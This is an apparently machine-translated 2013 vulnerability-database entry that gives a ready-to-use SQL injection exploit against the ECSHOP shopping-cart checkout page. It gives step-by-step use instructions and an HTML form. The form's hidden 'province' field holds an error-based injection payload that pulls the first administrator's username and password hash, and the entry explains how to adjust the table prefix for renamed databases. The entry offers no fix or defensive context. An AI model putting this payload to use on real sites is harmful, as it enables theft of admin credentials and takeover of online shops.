ECSHOP the flow of the page is injected using the method of&EXP-vulnerability warning-the black bar safety net

2013-05-22T00:00:00
ID MYHACK58:62201338889
Type myhack58
Reporter 佚名
Modified 2013-05-22T00:00:00

Description

Using way: first registration. Any goods added to the shopping cart fill in your delivery address of that page,there is the region of choice, pick a region,copy the address to the exp.

EXP: the

<form name="form1" method="post">

ECSHOP-pass version of injection vulnerabilities a simple EXP [ Silic Group Hacker Army ]<input name="country" type="text" style="display:none" value="1"/><br />

<textarea rows="5" style="font-family:Times New Roman;font-size:14pt;" cols="8 0" name="province">1 1'and(select 1 from(select count(),concat(floor(rand(0)2),0x3a,(select(select(SELECT concat(user_name,0x3a,password)FROM ecs_admin_user limit 0,1))from information_schema. tables limit 0,1))x from information_schema. tables group by x)a) and 1=1#</textarea>

<input name="district" type="text" style="display:none" value="1 2 9 4"/>

<input name="consignee" type="text" style="display:none" value="1 1 1 1 1 1 1"/>

<input name="email" type="text" style="display:none" value="root@WebShell.cc"/>

<input name="address" type="text" style="display:none" value="1 1 1 1 1 1"/>

<input name="tel" type="text" style="display:none" value="1 1 1 1 1 1 1"/>

<input name="step" type="text" style="display:none" value="consignee"/>

<input name="act" type="text" style="display:none" value="checkout"/><br /><br />

Address:<input name="theAction" type="text" id="theAction" value="http://xxx.com/flow.php?step=consignee" size="5 0"><br /><br />

<input type="submit" value="delivery to this address" onClick="this. form. action=this. form. theAction. value;" name="Submit"><br/><br />

// WebShell's Blog URL: Www.WebShell.CC

</form>

Add, if unsuccessful, note the error statement: the MySQL server error report:Array ( [0] => Array ( [message] = > MySQL Query Error ) [1] => Array ( [sql] => SELECT region_id, region_name FROM asky880.17_region WHERE r. This site changes the database's default name, in the exp there is also to be modified accordingly, the ecs_admin_user to 17_admin_user